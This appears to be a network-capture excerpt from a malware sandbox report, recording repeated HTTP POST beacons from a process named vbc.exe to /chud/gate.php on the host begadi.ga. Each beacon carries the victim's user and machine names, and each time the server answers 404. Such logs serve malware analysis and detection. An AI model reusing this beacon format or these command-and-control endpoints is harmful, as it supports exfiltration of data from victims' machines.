Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.22	49207	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:51.266644001 CET	669	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:51.325645924 CET	670	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:51.461715937 CET	670	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.22	49208	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:51.729572058 CET	671	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:51.789057016 CET	671	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:51.917480946 CET	671	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.22	49209	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:52.201844931 CET	672	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:52.258999109 CET	672	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:52.382858992 CET	673	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.22	49210	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:52.681830883 CET	674	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:52.747304916 CET	674	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:52.881215096 CET	674	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.22	49211	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:53.154706001 CET	675	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:53.213798046 CET	675	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:53.346194029 CET	676	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.22	49212	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:53.619537115 CET	676	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:53.684495926 CET	677	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:53.817548990 CET	677	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.22	49213	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:54.095933914 CET	678	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:54.154880047 CET	678	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:54.282756090 CET	678	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.22	49214	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:54.563018084 CET	679	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:54.623703957 CET	679	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:54.753853083 CET	680	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.22	49215	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:55.018162966 CET	680	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:55.077656984 CET	681	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:55.203334093 CET	681	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.22	49216	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:55.468060017 CET	682	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:55.533708096 CET	682	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:57.629524946 CET	682	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49172	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:34.470274925 CET	621	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:34.535698891 CET	622	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:34.668154001 CET	622	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.22	49217	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:58.210022926 CET	683	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:58.273217916 CET	683	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:58.403531075 CET	684	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.22	49218	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:58.669352055 CET	685	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:58.732717037 CET	685	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:58.864826918 CET	685	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.22	49219	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:59.144565105 CET	686	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:59.205810070 CET	686	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:59.334280014 CET	687	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.22	49220	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:59.604248047 CET	687	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:59.662579060 CET	688	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:59.791795015 CET	688	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.22	49221	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:00.066545963 CET	689	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:00.125519991 CET	689	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:00.256094933 CET	689	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.22	49222	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:00.524930000 CET	690	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:00.583291054 CET	690	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:00.710942030 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.22	49223	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:00.993901014 CET	691	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:01.051279068 CET	692	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:01.177423000 CET	692	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.22	49224	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:01.452553988 CET	693	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:01.510457039 CET	693	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:01.638468981 CET	693	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.22	49225	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:01.876667023 CET	694	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:01.934315920 CET	694	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:02.059926033 CET	695	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.22	49226	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:02.621823072 CET	696	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:02.686640024 CET	696	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:02.813173056 CET	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49173	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:34.978435993 CET	623	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
